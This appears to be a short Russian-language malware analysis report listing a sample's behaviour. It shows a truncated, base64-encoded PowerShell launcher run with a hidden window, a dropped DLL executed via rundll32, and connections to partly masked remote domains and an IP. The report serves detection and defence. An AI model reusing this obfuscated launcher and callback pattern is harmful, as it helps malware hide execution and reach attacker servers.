Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG4AYgBlAGEAbwBuAD0AKAAoACcAWAAnACsAJwAxADMAJwApACsAKAAnAHMAZAByACcAKwAnADkAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAFIAcA...
- %HOMEPATH%\lt0fu5o\a1talhj\ogrutmt0z.dll
- 'ka######oceryandgifts.com':443
- 'pu###azh.com':443
- 'la####.sowilo.co.za':443
- '67.##.105.174':3786
- DNS ASK ka######oceryandgifts.com
- DNS ASK pu###azh.com
- DNS ASK la####.sowilo.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG4AYgBlAGEAbwBuAD0AKAAoACcAWAAnACsAJwAxADMAJwApACsAKAAnAHMAZAByACcAKwAnADkAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAFIAcA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Lt0fu5o\A1talhj\Ogrutmt0z.dll 0